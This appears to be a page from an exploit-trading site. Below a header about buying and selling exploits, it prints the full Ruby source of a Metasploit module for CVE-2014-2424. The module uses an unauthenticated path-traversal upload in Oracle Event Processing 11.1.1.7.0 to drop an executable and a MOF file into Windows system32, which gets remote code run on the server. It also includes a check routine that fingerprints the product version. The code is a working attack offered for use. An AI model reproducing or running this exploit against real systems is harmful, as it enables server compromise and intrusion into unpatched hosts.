0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle Event Processing FileUploadServlet Arbitrary File Upload Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload',
'Description' => %q{
This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing
11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be
abused to upload a malicious file onto an arbitrary location due to a directory traversal
flaw, and compromise the server. By default Oracle Event Processing uses a Jetty
Application Server without JSP support, which limits the attack to WbemExec. The current
WbemExec technique only requires arbitrary write to the file system, but at the moment the
module only supports Windows 2003 SP2 or older.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2424'],
['ZDI', '14-106'],
['BID', '66871'],
['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 21 2014'))
register_options(
[
Opt::RPORT(9002),
# By default, uploads are stored in:
# C:\Oracle\Middleware\user_projects\domains\<DOMAIN>\defaultserver\upload\
OptInt.new('DEPTH', [true, 'Traversal depth', 7])
], self.class)
end
def upload(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"")
post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => '/wlevs/visualizer/upload',
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => data
})
res
end
def traversal
"../" * datastore['DEPTH']
end
def exploit
print_status("#{peer} - Generating payload and mof file...")
mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
exe_content = generate_payload_exe
mof_content = generate_mof(mof_name, exe_name)
print_status("#{peer} - Uploading the exe payload #{exe_name}...")
exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
res = upload(exe_traversal, exe_content)
unless res && res.code == 200 && res.body.blank?
print_error("#{peer} - Unexpected answer, trying anyway...")
end
register_file_for_cleanup(exe_name)
print_status("#{peer} - Uploading the MOF file #{mof_name}")
mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
upload(mof_traversal, mof_content)
register_file_for_cleanup("wbem/mof/good/#{mof_name}")
end
def check
res = send_request_cgi({
'uri' => '/ohw/help/state',
'method' => 'GET',
'vars_get' => {
'navSetId' => 'cepvi',
'navId' => '0',
'destination' => ''
}
})
if res && res.code == 200
if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
return Exploit::CheckCode::Detected
elsif res.body.to_s.include?("Oracle Event Processing 12")
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
end
# 0day.today [2024-11-15] #